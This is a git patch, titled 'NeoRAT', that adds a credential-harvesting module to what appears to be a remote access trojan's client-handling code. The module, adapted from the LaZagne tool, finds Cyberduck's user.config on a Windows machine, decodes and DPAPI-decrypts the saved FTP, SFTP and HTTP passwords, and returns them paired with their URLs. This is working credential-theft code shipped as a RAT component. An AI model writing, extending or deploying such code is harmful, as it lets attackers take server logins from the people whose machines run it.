From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL <alvin@alvinhavel.com>
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT

---
 .../lazagne/softwares/sysadmin/cyberduck.py        | 48 ++++++++++++++++++++++
 1 file changed, 48 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/sysadmin/cyberduck.py

(limited to 'foreign/client_handling/lazagne/softwares/sysadmin/cyberduck.py')

diff --git a/foreign/client_handling/lazagne/softwares/sysadmin/cyberduck.py b/foreign/client_handling/lazagne/softwares/sysadmin/cyberduck.py
new file mode 100644
index 0000000..a72a0a6
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/sysadmin/cyberduck.py
@@ -0,0 +1,48 @@
+# -*- coding: utf-8 -*- 
+import base64
+
+from xml.etree.cElementTree import ElementTree
+
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.winstructure import Win32CryptUnprotectData
+from foreign.client_handling.lazagne.config.constant import constant
+from foreign.client_handling.lazagne.config.winstructure import string_to_unicode
+
+import os
+
+
+class Cyberduck(ModuleInfo):
+    def __init__(self):
+        ModuleInfo.__init__(self, 'cyberduck', 'sysadmin', winapi_used=True)
+
+    # find the user.config file containing passwords
+    def get_application_path(self):
+        directory = os.path.join(constant.profile['APPDATA'], u'Cyberduck')
+        if os.path.exists(directory):
+            for dr in os.listdir(directory):
+                if dr.startswith(u'Cyberduck'):
+                    for d in os.listdir(os.path.join(directory, string_to_unicode(dr))):
+                        path = os.path.join(directory, string_to_unicode(dr), string_to_unicode(d), u'user.config')
+                        return path
+
+    def run(self):
+        xml_file = self.get_application_path()
+        if xml_file and os.path.exists(xml_file):
+            tree = ElementTree(file=xml_file)
+
+            pwd_found = []
+            for elem in tree.iter():
+                try:
+                    if elem.attrib['name'].startswith('ftp') or elem.attrib['name'].startswith('ftps') \
+                            or elem.attrib['name'].startswith('sftp') or elem.attrib['name'].startswith('http') \
+                            or elem.attrib['name'].startswith('https'):
+                        encrypted_password = base64.b64decode(elem.attrib['value'])
+                        password = Win32CryptUnprotectData(encrypted_password, is_current_user=constant.is_current_user, user_dpapi=constant.user_dpapi)
+                        pwd_found.append({
+                            'URL': elem.attrib['name'],
+                            'Password': password,
+                        })
+                except Exception as e:
+                    self.debug(str(e))
+
+            return pwd_found
-- 
cgit v1.2.3